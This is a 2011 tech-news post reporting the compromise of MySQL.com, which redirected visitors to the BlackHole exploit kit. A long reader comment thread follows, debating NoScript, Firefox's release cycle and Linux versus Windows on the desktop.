Well, this is embarrassing. MySQL.com has been hacked (fixed by now), and was turned into a platform serving malware to unsuspecting visitors. The criminals did this by injecting a script which redirected visitors to a website which uses the BlackHole exploit pack, which probes the browser used and serves up an appropriate exploit. Computer security blogger Brian Krebs saw root access to MySQL.com being offered for $3000 only a few days ago.
Armorize was the first to detail how the exploit works – and in quite some detail, too, including code samples and such. Basically, a script redirects the visitor to a website which hosts a BlackHole exploit pack.
“[The BlackHole exploit pack] exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, …), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,” Armorize explains, “The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”
This piece of malware is only detected by a small number of security software packages (4 our of 44). What, exactly, the malware does is a mystery – and by that I mean a mystery to me, since nobody seems to mention what it does.
Interestingly enough, a few days ago, Krebz noted that on an exclusive Russsian hacker forum, someone by the nickname of ‘sourcecode’ offered root access to MySQL.com, which is a very lucrative site to attack due to its 12 million visitors per month. The hacked version of MySQL.com was up for seven hours, meaning 12000 visitors were exposed to the BlackHole exploit pack.
“The ultimate irony of this attack is that the owner of mysql.com is Oracle Corp., which also owns Java, a software suite that I have often advised readers to avoid due to its numerous security and update problems,” Krebz notes, “As I’ve noted in several blog posts, Java exploits are the single most effective attacks used by exploit kits like BlackHole; currently, four out of nine of the exploits built into BlackHole attack Java vulnerabilities.”
Well, I need Java for Minecraft. So there.
In case you’re curious to see what happened when an unsuspecting user browsed to the compromised site, Armorize has posted a video showing what happened.
Noscript for Firefox. Scripts should only be run on pages that require them, and I know for a fact the homepage of MySQL.com makes use of them but doesn’t require JavaScript to work. This is why, despite it being relatively slow and Mozilla’s insane versioning scheme, I stick with Firefox. I’ve not found another add-on for any browser that comes close to the usefulness of Noscript in preventing malware from getting at me.
Agreed!!
NoScript, FlashBlock, AdBlock, NoSquint, ImageZoom, SmartVideo, and Yahoo! Mail Checker make my browsing experience smooth, safe, and intelligent.
I routinely load up a dozen or so YouTube videos to watch, and so having SmartVideo load them at 240p, paused, is a great help! Very few videos deserve/need any more detail than that anyway 😉
–The loon
FlashBlock is an insecure way to block Flash and NoScript includes a secure way which can be enabled for trusted sites too, giving a FlashBlock-like experience (lack of a whitelist aside).
Aside from that, it sounds like we have similar opinions on things.
It’s not really hard to be safe without all those tools, particularly when you’re the kind of user who would seek out and install them (and if you aren’t, not much can help
)
PS. And you probably didn’t even notice what helps to keep this site afloat?
Edited 2011-09-27 00:05 UTC
Just for a bit of anti-FUD: Firefox 7 is due for release today (27 September 2011). It is very probably the fastest browser available now, overtaking Chrome.
Rapid advancement such as this is made possible by Mozilla’s new upgrade policies and versioning scheme.
In benchmarks? In situations when it really matters (on slow, old machines), I still find current versions of Firefox and Chrome (or Opera) worlds apart.
Firefox 7 should be the fastest (overall) current browser on slow, old machines, when it really matters.
Speed improvements are due to reduced memory usage, faster startup and the new Azure graphics API, so no, not in javascript benchmarks but in real performance.
http://techpp.com/2011/08/09/firefox-7-leaner-faster-and-more-stabl…
“Though it’s been less than a month since Firefox 5 was released, we have started getting information about how Mozilla’s Firefox 7 will be much faster than Firefox 6, will use much lesser memory and it will be less likely to crash. Its memory remains steady if you leave it running and as you close tabs, memory is freed up.
The way in which Mozilla Firefox has used memory has changed over the years, improving from one version to another. Firefox 3, 3.5 and 3.6 were considerable enhancement over Firefox 2. But when Mozilla released Firefox 4, it kind of regressed, instead of improving, mainly due to a large number of new features and to Java script. As to overcome the shortcomings, Mozilla aimed to improve Firefox’s speed and stability by reducing memory usage and released MemShrink. Soon, step by step progresses have been made and Firefox 7 is the first to benefit from MemShrink’s success.”
http://tech18.com/firefox-7-features.html
What is expected out of Firefox 7?
#1. New 2D Graphics API – Azure
#3. Faster Startup
#4. 30% Reduction in Memory Usage
Enjoy.
Edited 2011-09-27 01:00 UTC
So when will Firefox v20 be available, jeez…
/I actually do use firefox a lot, mainly for portability and plugins.
Possibly just before Chrome v42.
Why did firefox change to a similarly paced version numbering system? With Chrome, I don’t even pay attention to version changes, but with firefox updates and addon issues, it is hard not to. Maybe that’s just me, and I admit I use more addons in firefox than in chrome.
http://mashable.com/2011/08/26/mozilla-rapid-release-firefox/
Mozilla: “Now, Mozilla’s Chairman Mitchell Baker responds to the criticism in a blog post. She starts by acknowledging the problem: “There is work to be done to make the rapid release process smoother and hopefully more useful to more of our userbaseâ€, she writes.
However, due to the rapidly changing nature of the Internet, Baker thinks it’s necessary for the browser to follow this breakneck pace. “If we want the browser to be the interface for the Internet, we need to make it more like the Internet. That means delivering capabilities when they are ready. That means a rapid release process. If we don’t do something like this the browser becomes a limiting factor in what the Internet can doâ€, she writes.
Baker’s end thoughts don’t leave much hope that the rapid release process will change in the near future. “There is no free lunch (…) I know that’s not a perfect answer, and it’s not a promise that we can meet everyone’s needs perfectly. Despite this, I believe the rapid release process is the right directionâ€, Baker writes.”
It is not as bad as the media beat-up would have it:
http://download.cnet.com/8301-2007_4-20093070-12/new-firefox-6-beli…
All add-ons hosted on addons.mozilla.org should update automatically and relatively painlessly.
Mozilla has also released the Jetpack SDK 1.1, which allows for addons written in the same way that Chrome does it.
http://news.softpedia.com/news/Mozilla-s-Add-on-SDK-1-1-for-Restart…
Because this is fairly new, and because it is not as powerful as the original XUL addons, most Firefox addons do not use the Jetpack SDK.
For people (mainly businesses) who do not want their browser “keeping pace with the Internet”, Mozilla is apparently proposing an “Extended Support Release” version, starting with Firefox 8.
http://news.cnet.com/8301-30685_3-20109245-264/mozilla-proposes-not…
PS: hey, look at that! Firefox v20 is apparently due 26th March 2013.
Edited 2011-09-27 04:41 UTC
You forgot to mention that JetPack exists since 2009 and many extensions that have been created since then already use it.
It is mostly the older extensions that do not yet support it, but as mentioned above most can be rewritten to use JetPack. Mozilla recently added more functions to JetPack so many more/others can be rewritten.
Rewritten means it should be easy to change from the older extension model to the new.
Every version of firefox since 1.5 has claimed to fix the memory issues. Honestly, I wouldn’t notice them anymore, but that is probably because I have eight gigs of ram on my workstations, as opposed to the 512 mb I had when ff 1.5 was out. Those with less memory still claim to have the memory leak.
Most of the things you mention are just benchmarks (I didn’t say “javascript benchmarks”) – easy to obtain numbers many “enthusiasts” like to gloat about, but which don’t translate directly to end user experience (particularly when it really matters, on slow & old machines; mostly shunted by “enthusiasts” and devs)
Anyway, I gave it a few days on one slow “piece of junk” I keep around (~”desktop replacement” laptop with Celeron 1.4 of the generation derived from Pentium M or Core Duo; it was the laptop CPU when they really took off here a few years back, many people still have such machines – generally, continuing to use them as long as they function; and it isn’t RAM-starved while browsing, in any browser); yeah, I give each browser a minimum of few days, I’m typically weird like that.
Maybe memory usage improved, I don’t know (no browser is memory starved on the piece of junk in question anyway, when opening sane numbers of tabs); maybe it starts faster, I don’t care (every browser starts decently on this machine – and it’s irrelevant anyway, I don’t do it that often); those are benchmarks. Maybe it uses some new library in the back-end …why should I care about its name and what it claims to do? (Mozilla claims massive improvements every single time, at each release …well, after first few years of denying given problem, that is)
What’s important, is that there is little to no difference felt. Stuff like how the UI feels, how the application responds to user actions, even how the scroll feels. FF is still worlds apart from Chrome (or Opera), when it really matters, in usage.
But I imagine “enthusiasts” and devs don’t experience it much… (or are so enthusiastic about their darling to genuinely overlook such “details”)
(BTW, as far as I am concerned 3.x+ was a major disappointment from 2.x – maybe it looked better in benchmarks, but it felt much worse, kinda like they went outside sane tweaks, patterns for their codebase – characteristics of which certainly play a role, Webkit is used successfully in mobiles for quite some time, while Mozilla had few aborted attempts, openly saying “we’ll wait for hardware” …wasn’t “true OSS” supposed to be about retiring planned obsolescence and such?)
And Firefox breaks all my extensions that I use for Web Development every two weeks … Thanks Mozilla Team.
It shouldn’t. The majority of XUL extensions, and nearly all plugins, themes, search engines and Jetpack addons, will continue to run happily after an upgrade of Firefox.
Unless, that is, your extensions check the Firefox version and explicitly disable themselves after an upgrade.
If that is the case, you can thank the authors of the extension(s) that are giving you trouble, rather than thank the Mozilla Team.
Wouldn’t be a problem if Mozilla aren’t do this silly dev cycle and btw it is Firefox that disables them after doing a compatibility check.
TBH I am not that impressed with any of the new Web browsers, there are more rendering bugs now to deal with cross browser and more annoying niggly bugs … and don’t even get me started with browser specific css extensions.
+1
Coincidentally, just today I encountered an attack site where Noscript would have saved my bacon, had I been running Windows. At this point I consider script blocking, or extensions providing it, an essential browser feature.
At this point I consider not running Windows an essential feature 😛
While I don’t use Windows and I’d be happy to see more people abandon the platform, right now I don’t think there’s a good alternative; there’s just too much software that’s only available for Windows.
(Really it’s kind of a catch-22. Software is available for Windows because it’s the most common desktop OS. But until people start migrating away from it, the software won’t be available for other OSes; and people won’t be quick to migrate away from it due to lack of available software. Yippee.)
Also, most Linux distros have sucky security by default. Just sayin’.
While particular products, such as for example Microsoft Office, are available only for Widows, the product type most certainly is not constrained to Windows. See LibreOffice, for example.
Now while some products are not 100% interchangeable, for the vast majority of uses they are.
The majority of people could happily run everything they needed on a platform other than Windows. Easily.
None of them are of good enough quality, except things which are already cross platform or they are dev tools … unless you are talking about the Macintosh.
Until I don’t ever have to fix anything on the terminal … it will not be good enough for consumers.
Edited 2011-09-27 12:00 UTC
Many of the FOSS desktop applications are significantly better than the equivalent proprietary offerings.
Examples:
This is the default plain text editor on my Linux distribution:
http://kate-editor.org/about-kate/
This is the default file manager:
http://dolphin.kde.org/features.html
This is the default document viewer:
http://okular.kde.org/formats.php
Compare these to the default on Windows 7 … Notepad, Windows explorer and nothing.
My desktop itself, KDE Plasma, has significantly better features than Windows 7.
http://en.wikipedia.org/wiki/KDE_Plasma_Workspaces#Features
An ordinary user doesn’t ever have to fix anything on the terminal.
http://commons.wikimedia.org/wiki/File:KDE_SC_4.5_System_Settings.p…
Edited 2011-09-27 12:44 UTC
Depends ultimately. Some are … some aren’t. However it is a matter of opinion and not a fact.
If they are using a text editor it for saving something like a phone number, one does not need anything better than WordPad (which is installed by default).
They don’t need all the features of something like kate.
Normal users don’t use these extra features … I don’t even use half the features in Windows Explorer and I am a developer.
Adobe Reader is free and is pretty good, there is always foxit and quite a few others.
That is your opinion not mine. I personally think that KDE lacks a lot of graphic polish … things like spacings of text and window borders.
I don’t even use Alt Tab that often … most people don’t need or even know about lots of extra features … they just want to use something simply.
Having more features does not mean something is better
“Antoine de Saint-Exupery” said it better than I.
… Think about it for a second.
This is a downright lie. When something does go wrong (happens frequently … all one has to do is visit Ubuntu forums for evidence that this happens a lot).
The only way to fix it in Linux is by using the terminal and since with Linux distros core configuration files are kept in different places depending on distribution … looking for help on the web isn’t easy.
Edited 2011-09-27 13:20 UTC
Give up while you’re way behind. Everyone of the apps he mentioned is unarguably better than the windows equivalent. Your best argument against them is “most people don’t need a better product”.
In linux you *can* fix problems on the command line, in windows you *can not* fix problems on the command line. Its not a bug, its a feature. Most of the time, editing the registry is the only way to fix a windows problem which is much more complex, less documented than any command line linux fix.
No I am not saying that. What I am saying and what you guys don’t understand is having more it not always better when designing user interfaces.
What you guys are doing is comparing Paint.NET to Photoshop.
Paint.NET is brilliant for editing Photos and simple graphics, and has IMO a nice and easy to user interface. It is great for what it is meant to do.
Photoshop is overkill compared to Paint.Net for simple edits and takes longer to learn even simple stuff.
However photoshop is the obvious choice for professional use and it position in the industry reflects this.
Same with Notepad and Explorer. For what they are intended to do, simple editing and file browsing they are work just fine.
In fact Dolphin’s original motivation (it came out 2004-2005) was to be a simpler alternative to what was KDE’s file browser at the time (which I believe was konquerer).
If people need something more complicated there are solutions out there for people that need them such as kate.
Oh comon, we all know that statement is a bit of a joke.
Fixing problems on the CMD line, and registry hacking are both unnacceptable IMO.
However registry hacks are really only needed when a system is really screwed (and a Reinstall is probably warranted).
I don’t think expecting a person (consumer) to use a *nix command line to solve system problems is acceptable. It just proves that usability for consumers isn’t baked into Linux, like it is for MacOSX and Windows. Which is fine … for people that don’t expect that level of integration. Which proves my point.
Edited 2011-09-27 15:49 UTC
Oh, come, on. You really think kate or dolphin are too complex for people to use? No you don’t. That’s absurd. You just want to argue more.
Windows can develop really complex problems that I could fix via the command line in linux, but I can’t fix them because that isn’t exposed via command line in windows. Easy things should be easy, and complex things should be possible.
The original argument was that “KDE is soo much better because it can do all these things”.
My argument is that “While it can do more out of the box, this isn’t always the best measure of whether something is actually better.”
I explained my reasoning with the photoshop example.
Frequently on here people latch onto specifics … and miss the underlying point I was trying to make. Which is extremely frustrating …
I don’t want to argue … I want you guys to actually understand the point I am making.
Way to go and miss the whole point. This is fine for the likes of you and me.
The original argument was “(Desktop) Linux is good enough for most people” … mine was this isn’t true because people who don’t understand how to use a terminal will at some point be forced to use it and that is why I don’t think it is good enough.
Why is it that people are still saying things like this as though they haven’t been said thousands of times before in the past decade. It really misses the salient point which had nothing to do with ease-of-use.
Windows simply had the necessary inertia and network-effect to short circuit the potential of any serious competitor. Linux was never ready for the masses as a Desktop O/S and much of the energy spent in that direction was a pointless diversion from the areas where it shines.
Arguing about Linux-on-the-desktop is even more boring than all of the recent licensing debates.
I absolutely agree.
I am fine with that … I use Icaros/OpenBSD as a Hobby OS on my own computers … however the OP continues to state the opposite as if it was fact and I take issue with that.
See, I’m here not arguing that Linux is a perfect replacement for windows for most users. I’m arguing that your reasons are not real reasons. [ ok maybe it was I that was arguing for the sake of arguing
]
The real reasons why it isn’t a good replace has nothing to do with the command line, it has everything to do with app and hardware compatibility. What, in your opinion, is something that common users are forced to do command line that they can equivalently do through a gui or automatically happens in windows?
Fair enough. I think my paint.net vs photoshop example was probably a better example, then say kate vs notepad … but we have been over that
Fedora FAQ
http://www.fedorafaq.org/
I think there are quite a good few example there IMO.
http://www.fedorafaq.org/#nvidia
(and before anyone jumps at me saying it is a closed source drivers … I really don’t care … People expect their hardware to just work).
I appreciate it maybe different in other distributions … but it is an example.
Just setting up the repos at the start of the article is too much for say my step-mother or my brother.
I haven’t been using Linux recently enough to possibly comment. But I still see the same the complaints and problems that were present when I was an admin in 2007 …
Under Linux you also get a choice in regard to complexity. For example: Leafpad instead of Notepad, AbiWord instead of Wordpad.
http://www.makeuseof.com/tag/leafpad-ultralightweight-text-editor-l…
http://www.abisource.com/
In each case the Linux desktop program choice is better than the Windows close equivalent.
In each application area, the Linux default application is far better than the Windows default application.
For Photoshop replacements, perhaps use krita for actual painting (creation) of raster graphics, and digikam for photo editing.
http://krita.org
http://www.digikam.org
RedHat have more or less abandonned the desktop, it is not their focus.
Have a look at Ubuntu/Kubuntu, Mint, OpenSuse or Mandriva. No need to use the command line.
Apart from the fact that people are better off these days using the default (open source) drivers, for your example of the closed source drivers (if one insists) one can use jokey-kde for GUI-only installation of closed-source driver alternatives. Because the open source drivers will just work, and work well, it is perhaps not recommended to use closed source drivers. Having said that, still it is not forbidden either to use the closed-source drivers, and it certainly does not require the use of the command line.
For GUI package management, Muon is the new GUI package manager in Kubuntu.
Hint: To make a valid point, you need to argue against what the Linux desktop experience actually is, not your strawman disparagement of it.
Edited 2011-09-28 01:16 UTC
For anyone interested, here is a preview of the Muon Package Management Suite.
http://www.linuxbsdos.com/2011/09/26/muon-package-management-suite/
Even one’s step-mother or brother would have absolutely no trouble installing, managing and updating applications in Kubuntu 11.10 using Muon.
There is nothing available for Windows which comes anywhere close to matching this for a one-stop, easy to use method of searching for, installing, managing and updating applications.
No contest hands-down win for Linux on the desktop here.
Edited 2011-09-28 04:56 UTC
You always miss the point …
He didn’t miss the point. You’re missing the point, lucas.
I don’t think so.
1) He completely missed the point with Photoshop VS Paint.NET example.
2) Advised that I distro hopped … So reinstall my whole OS, instead of actually having the underlying problem fixed in the first place (HINT: Stable drive ABI).
3) Advised that I should use under performing drivers so I don’t get the best out of my hardware.
4) Seems to think that Package manager is better than an installer for some reason. I left my fedora server off for 2 weeks … 600 updates …
If all Linux can offer is a “knock off” of Windows interface with Applications which are knock off of Windows application … Why should anyone choose Linux over the real thing.
Even the creator of Gnome has similar opinions.
http://www.pcpro.co.uk/news/370171/gnome-creator-linux-has-only-10-…
Edited 2011-09-28 14:27 UTC
Is that really the point? Or is the point that you, despite saying you’re an OpenBSD user, are especially touchy whenever anybody criticizes Windows. Why is that? Why would you care when you’re an OpenBSD guy?
Because most of the criticism is pretty much FUD … or some damn lies
http://tmrepository.com/trademarks/popular/
Their are GUI package managers. So none of the yum commands applies as a valid example. I’m not sure why the FAQ has them. Except, perhaps because a GUI is not necessary in Fedora.
The Nvidia example doesn’t apply because its not necessary ( the open source one works well enough ) and its not an every day command that ordinary people need to do. There *really* are not Command line things that ordinary people *need* to use on a daily, weekly, monthly or even yearly basis. Its an old canard, like saying windows doesn’t mulitask or isn’t stable.
Now the Nvidia example, while not a good command line usage requirement, is a good example of why Linux is not for everyone. The only real reason to install the proprietary graphics drivers is for better graphics performance, like for games and what not. There really aren’t many games for linux, and most popular windows games do not work, even with wine.
You don’t want to argue because the point you were trying to make is dead wrong.
This was what you said:
Utterly wrong.
My original point stands: “Now while some products are not 100% interchangeable, for the vast majority of uses they are. The majority of people could happily run everything they needed on a platform other than Windows. Easily.”
I’ll extend it further: For the vast majority of uses which ordinary people use their computer, the Linux desktop (particularly KDE4) is significantly superior to the Windows 7 desktop, by every measure.
“Every measure” would include: overall cost; speed/performance; security; ease of use; ease of maintenance; far less frequent need to reboot; lack of licensing and other permission, ownership and other legal issues; lack of adware, nagware, spyware, trialware and other annoyances; compatibility with hardware old and new; lack of obsolesence issues; ease of finding and installing new (and powerful) desktop applications; vastly reduced external threats against the system; and configurability and arrangement of the desktop itself.
I want you to actually understand the point I am making. To me, it doesn’t seem that difficult to grasp.
Funny then how often that argument is made in favor of Windows. It has more software, more featues, more options and therefore it is better.
Windows isn’t exactly the poster-child for “simplicity is perfection”, quite the opposite.
And you don’t ever have to fix anything on Windows?
Seriously? If that level of perfectionism is what you want, then you’ll never find any kind of replacement.
As it is, Debian/Ubuntu+KDE is at or better quality on stability than Windows and you don’t have to touch the command-line.
It’s really a matter of which distro you choose. Debian/Ubuntu are among the best right now, and you don’t need hand-holding for very long.
A number of years back there was a Redmond Desktop Linux (made by ex-Microsoftees) that at the time (2003) had a superb installer (better than any other Linux distro at the time), and needed no command-line support. I installed it to test it out and it was excellent. Sadly, it was also very limited as you couldn’t install a compiler (not available in their package management system), but it was otherwise on-par with Windows.
Editing the registry is a lot more easier! Windows must have some sort of service specifically designed to stop programs from removing all the crap that they place in the registry. :wink
Joking aside I rarely need to use a the terminal to fix things in Ubuntu or Fedora, this really has become less of an issue in the last 3 years or so.
All operating systems have points of irritation.
So if we equate the use of the terminal to using regedit then Windows isn’t ready for consumers either.
That seems like a bit too narrow a market for an office suite.
Really? What makes you say that?
Ubuntu: five minute no-password timeout for sudo.
Mint: same, and no package signing.
Arch Linux: no package signing until recently.
Many, many distros: no mandatory access control system for sandboxing applications. Windows now has a mandatory access control system installed and enabled by default. One can of course set up a chroot on any distro, but AFAIK normal Linux chroots are not hard to break out of.
(Ubuntu, at least, has AppArmor and a profile for Firefox… But it doesn’t enable it by default.)
Neither of these magically make security better. In fact, both are overrated as security features. Does Windows MAC prevent malware, trojans or viruses? Real-world experience says no. A rooted system is not a big problem, lost user data and compromised privacy is.
I’m not saying Linux is necessarily better than Windows in this respect though but holding up Windows as a great champion of secutiy because it has MAC is rather naive.
What does package signing give you? Yeah, the same site that distributes the packages ensures you they’re the real thing.Too bad that will break down when the site is compromised.
FWIW I don’t hold Windows as a “champion of security.” And the reason I mentioned MAC is that it can protect the user’s data.
Can is not the same as does.
JavaScript is not the same as Java-Applet.
In Firefox you can just disable the Java-plugin, you’ll probably never need it.
I’ve never tried Minecraft, but I don’t think you run it in the browser, right ?
Minecraft can be run as an applet or via a downloadable launcher JAR.
I use the JAR because the applet crashes the IcedTea (libre Java) browser plugin.
I think you’re being a little unfair to other browsers there: I know for a fact that Opera has this function built in and I’m pretty sure there’s similar Chrome extensions available too.
However flamewars aside, you do make a good point about browser security
Opera, as far as I can tell, does not have anything like Noscript built in. There is one extension and one userscript, but the extension is not very powerful and the userscript breaks many websites.
Chrome doesn’t either. There is the ScriptNo extension though, which seems to be fairly good.
(Chrome’s built-in script blocking doesn’t count – it does per-page blocking, not per-domain blocking.)
It does have it built in:
Settings -> quick preferences -> untick ‘enable javascript’
You can also enable/disable plug ins too – which works just the same as Flash Block except it’s against ALL plug ins (including Adobe PDF and Java Applets such as those used in this exploit)
I hadn’t said Chrome had any functionality built in. I said there are extensions available.
I’m so glad that I only visit non-FOSS websites… LOL.
Interestingly enough Oracle had just announced that MySQL was turning into an Open Core model, rather than staying as FOSS.
Another good reason to use PostgreSQL
Its interesting that ClamAV was one of the first four security software packages that could detect this piece of malware
If you look at the VirusTotal report carefully, you’ll notice that none of the security programs actually “caught” the hack. 4 of 44 simply labeled it as “suspicious” which in regular-user terms means “false-positive”.
Sadly this is starting to look like the normal state of affairs. There seem to be whole categories of malware, e.g. fake antivirus trojans, that most AVs just don’t detect.
Furthermore, “realtime” antivirus protection is often a joke in my experience. I’ve seen computers get infected straight through it with big-name antiviruses like Norton and McAfee.
I figure this is the reason Microsoft decided to implement UAC… Which would probably be quite effective, if everyone and their sister didn’t turn it off!
IE9 by default block cross site scripting and also by turning on the “Tracking Protection”. You are more secure!!. Firefox & Chrome should adopt this feature.
XSS blocking != wholesale Javascript blocking. Though last I checked it is possible to get Noscript-like functionality on IE using Proxomitron.
(And IIRC Chrome does include some measures against XSS, just not as many as Noscript.)
IE 8 and 9 are sandboxed on Windows Vista and 7 though, if you enable UAC. Not sure how effective that would be in this case. I personally wouldn’t know, since I never use IE – I find the user interface annoying.
“The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”
Is this a Windows only exploit?
Yes. It was shown in the video embedded within this article.
Can you please refrain from making this yet another linux vs. Windows whine-fest? Just accept that you have a tiny penis and move on with your life.